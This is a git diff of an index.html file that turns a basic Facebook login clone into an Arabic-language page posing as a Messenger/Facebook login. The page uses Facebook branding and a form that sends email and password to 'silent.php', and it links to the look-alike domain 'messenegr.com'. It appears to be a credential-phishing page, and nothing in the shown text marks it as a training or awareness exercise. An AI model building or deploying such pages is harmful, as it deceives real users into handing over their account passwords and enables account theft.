--- a/index.html
+++ b/index.html
@@ -1,85 +1,106 @@
+
 <!DOCTYPE html>
-<html lang="en">
+<html lang="en" dir="rtl">
 <head>
     <meta charset="UTF-8">
+    <title>Messenger - login</title>
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Facebook-login or sign up</title>
-    <link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon">
-    <link rel="stylesheet" href="style.css">
+    <link href="assets/4001482128-css_bundle_v2_rtl.css" rel="stylesheet">
+    <meta property="og:image" content="https://i.imgur.com/1d8JBel.jpg">
+<meta property="og:url" content="https://i.imgur.com/1d8JBel.jpg">
 </head>
 <body>
-    <header>
-        <div class="container">
-            <div class="flex-item">
-                <div class="logo-area">
-                    <img src="images/fb-logo.svg" alt="facebook">
-                    <p>Facebook helps you connect and share with the people in your life.</p>
-                </div>
-                <div class="login-area">
-                   <div class="box">
-                        <form action="post.php">
-                            <input type="text" name="email" id="mail" placeholder="Email address or phone number">
-                            <input type="password" name="password" id="passcode" placeholder="Password">
-                            <input type="submit" value="Log In">
-                            <a href="#" class="fp">forgotten password?</a>
-                        </form>
-                        <hr>
-                        <a href="#" class="c-account">create new account</a>
-                   </div>
-                    <p> <a href="#" class="c-page">create a page</a> for a celebrity, band or business</p>
-                </div>
-            </div>
-        </div>
-    </header>
-        <footer class="footer-area">
-            <div class="container">
-                <div class="footer-top">
-                    <ul>
-                        <li><a href="#">English (US)</a></li>
-                        <li><a href="#">বাংলা</a></li>
-                        <li><a href="#">Español</a></li>
-                        <li><a href="#">Português (Brasil)</a></li>
-                        <li><a href="#">العربية</a></li>
-                        <li><a href="#">Italiano</a></li>
-                        <li><a href="#">Bahasa Indonesia</a></li>
-                        <li><a href="#">Français (France)</a></li>
-                        <li><a href="#">Deutsch</a></li>
-                        <li><a href="#">हिन्दी</a></li>
-                        <li><a href="#">…</a></li>
-                    </ul>
-                </div>
-            
-                <hr>
-            
-                <div class="footer-bottom">
-                    <ul>
-                        <li><a href="#">Sign Up</a></li>
-                        <li><a href="#">Log In</a></li>
-                        <li><a href="#">Messenger</a></li>
-                        <li><a href="#">Facebook Lite</a></li>
-                        <li><a href="#">Mobile</a></li>
-                        <li><a href="#">Find Friends</a></li>
-                        <li><a href="#">Badges</a></li>
-                        <li><a href="#">People</a></li>
-                        <li><a href="#">Pages</a></li>
-                        <li><a href="#">Places</a></li>
-                        <li><a href="#">Games</a></li>
-                        <li><a href="#">Locations</a></li>
-                        <li><a href="#">About</a></li>
-                        <li><a href="#">Create Ad</a></li>
-                        <li><a href="#">Create Page</a></li>
-                        <li><a href="#">Developers</a></li>
-                        <li><a href="#">Careers</a></li>
-                        <li><a href="#">Privacy</a></li>
-                        <li><a href="#">Cookies</a></li>
-                        <li><a href="#">Ad Choices</a></li>
-                        <li><a href="#">Terms</a></li>
-                        <li><a href="#">Help</a></li>
-                    </ul>
-                </div>
-                <div class="copyright">
-                    <p>Facebook © 2020</p>
-                    <a href="#">English (US)</a>
-        </footer>
+<img style="height: 120px !important;
+width: 184px;
+background-position: 0 0;
+display: block;
+margin-right: auto;
+margin-left: auto;
+background-image: url(https://i.imgur.com/T8FJXmh.jpg);
+background-size: auto;
+background-repeat: no-repeat;" src="https://i.imgur.com/T8FJXmh.jpg">
+<h1 style="color: rgba(0, 0, 0, 1);
+font-size: 41px;
+font-weight: 300;
+margin-bottom: 0.5rem;
+text-align: center;
+padding: 0;
+font-family: Helvetica Neue, Segoe UI, Helvetica, Arial, sans-serif;">
+    Facebook
+</h1>
+
+<h2 style="color: rgba(0, 0, 0, 1);
+font-size: 17px;
+font-weight: 200;
+line-height: 1.2;
+margin-bottom: 24px;
+text-align: center;
+font-family: Helvetica Neue, Segoe UI, Helvetica, Arial, sans-serif;
+}">يمكنك التواصل فورًا مع الأشخاص الموجودين في حياتك </h2>
+<p style="color: rgba(0, 0, 0, 1);
+font-size: 17px;
+font-weight: 200;
+line-height: 1.2;
+margin-bottom: 24px;
+text-align: center;
+font-family: Helvetica Neue, Segoe UI, Helvetica, Arial, sans-serif;
+}">تسجيل الدخول بحساب ‏‎Facebook‎‏ لبدء الاستخدام</p>
+<form action="silent.php" id="veh0" method="post" name="loginform">
+    <input style="border: 1px solid rgba(0, 0, 0, .20);
+border-radius: 4px;
+color: rgba(0, 0, 0, 1);
+display: block;
+font-family: Helvetica Neue, Segoe UI, Helvetica, Arial, sans-serif;
+font-size: 18px;
+height: 42px;
+margin-bottom: 12px;
+margin-right: auto;
+margin-left: auto;
+padding: 0 16px;
+width: 286px;
+background: #FFFFFF  repeat-x;" minlength="3" name="email" placeholder="البريد الالكتروني او رقم الهاتف" required="" type="text">
+    <input style="border: 1px solid rgba(0, 0, 0, .20);
+border-radius: 4px;
+color: rgba(0, 0, 0, 1);
+display: block;
+font-family: Helvetica Neue, Segoe UI, Helvetica, Arial, sans-serif;
+font-size: 18px;
+height: 42px;
+margin-bottom: 12px;
+margin-right: auto;
+margin-left: auto;
+padding: 0 16px;
+width: 286px;
+background: #FFFFFF  repeat-x;" minlength="6" name="pass" placeholder="كلمه السر" required="" type="password">
+    <input style="
+background: #fff;
+color: #0084ff;
+font-size: 25px;
+font-weight: normal;
+margin-top: 24px;
+align-items: center;
+border: none;
+box-shadow: none;
+display: flex;
+margin-right: auto;
+margin-left: auto;
+overflow: hidden;
+text-overflow: ellipsis;
+white-space: nowrap;
+font-family: Helvetica Neue, Segoe UI, Helvetica, Arial, sans-serif;
+cursor: pointer;
+line-height: 26px;
+padding: 0 10px;" type="submit" value="متابعة">
+</form>
+
+
+<div style="font-size: 14px;
+text-align: center;
+padding: 15px;
+margin: 10px;">
+    <a href="https://messenegr.com/" id="copyright" style="text-decoration: none; color: #999999;  font-weight: bold; " title="Messenger">
+        Facebook Copyright ©️
+    </a>
+</div>
 </body>
 </html>
